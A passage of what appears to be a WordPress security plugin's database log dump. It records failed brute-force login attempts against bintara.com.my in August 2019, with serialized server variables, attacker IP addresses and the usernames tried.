Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.94.107\";s:11:\"REMOTE_PORT\";s:5:\"53420\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSEpB90bn5mtr-PXqrP5AAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566868644.6565\";s:12:\"REQUEST_TIME\";s:10:\"1566868644\";}}','notice','2019-08-27 01:17:25','2019-08-27 01:17:25',17686696,19179296,'https://bintara.com.my/wp-login.php',1,0,'104.238.94.107'),(23339,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.196.209.177\";s:11:\"REMOTE_PORT\";s:5:\"58706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSAZx90bn5mtr-PXqrNDwAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566867559.2561\";s:12:\"REQUEST_TIME\";s:10:\"1566867559\";}}','notice','2019-08-27 00:59:20','2019-08-27 00:59:19',17685184,19176632,'https://bintara.com.my/wp-login.php',1,0,'37.196.209.177'),(23340,0,'brute_force','invalid-login::username-tester','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"tester\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"474\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.196.209.177\";s:11:\"REMOTE_PORT\";s:5:\"59132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSAamXkG1atThADMYGVTQAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566867562.7641\";s:12:\"REQUEST_TIME\";s:10:\"1566867562\";}}','notice','2019-08-27 00:59:24','2019-08-27 00:59:23',18199304,19495216,'https://bintara.com.my/xmlrpc.php',1,0,'37.196.209.177'),(23341,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"80.211.189.126\";s:11:\"REMOTE_PORT\";s:5:\"38613\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSElx90bn5mtr-PXqrPygAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566868631.6842\";s:12:\"REQUEST_TIME\";s:10:\"1566868631\";}}','notice','2019-08-27 01:17:13','2019-08-27 01:17:12',17686032,19175960,'https://bintara.com.my/wp-login.php',1,0,'80.211.189.126'),(23236,0,'brute_force','invalid-login::username-test2','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"test2\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.79.117.202\";s:11:\"REMOTE_PORT\";s:5:\"56492\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ9Mx90bn5mtr-PXqq3BAAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566850355.686\";s:12:\"REQUEST_TIME\";s:10:\"1566850355\";}}','notice','2019-08-26 20:12:37','2019-08-26 20:12:36',18199136,19495664,'https://bintara.com.my/xmlrpc.php',1,0,'51.79.117.202'),(23225,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQt4xTEVi0fEJEHuDZGFAAAABQ\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.154.148\";s:11:\"REMOTE_PORT\";s:5:\"47454\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQt4xTEVi0fEJEHuDZGFAAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846435.6744\";s:12:\"REQUEST_TIME\";s:10:\"1566846435\";}}','notice','2019-08-26 19:07:17','2019-08-26 19:07:16',18301264,19502648,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'104.131.154.148'),(23226,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.9.195\";s:11:\"REMOTE_PORT\";s:5:\"33793\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQvkA0@TGWC-1tzGX5ctAAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846864.3302\";s:12:\"REQUEST_TIME\";s:10:\"1566846864\";}}','notice','2019-08-26 19:14:25','2019-08-26 19:14:24',17686664,19177376,'https://bintara.com.my/wp-login.php',1,0,'37.59.9.195'),(23227,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.53.174\";s:11:\"REMOTE_PORT\";s:5:\"56664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQxehTEVi0fEJEHuDZHvQAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566847354.7518\";s:12:\"REQUEST_TIME\";s:10:\"1566847354\";}}','notice','2019-08-26 19:22:36','2019-08-26 19:22:35',17684792,19175264,'https://bintara.com.my/wp-login.php',1,0,'159.89.53.174'),(23228,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.196.204.173\";s:11:\"REMOTE_PORT\";s:5:\"50496\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQzemXkG1atThADMYGOAgAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566847866.1512\";s:12:\"REQUEST_TIME\";s:10:\"1566847866\";}}','notice','2019-08-26 19:31:07','2019-08-26 19:31:06',17688872,19180712,'https://bintara.com.my/wp-login.php',1,0,'5.196.204.173'),(23229,0,'brute_force','invalid-login::username-user','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 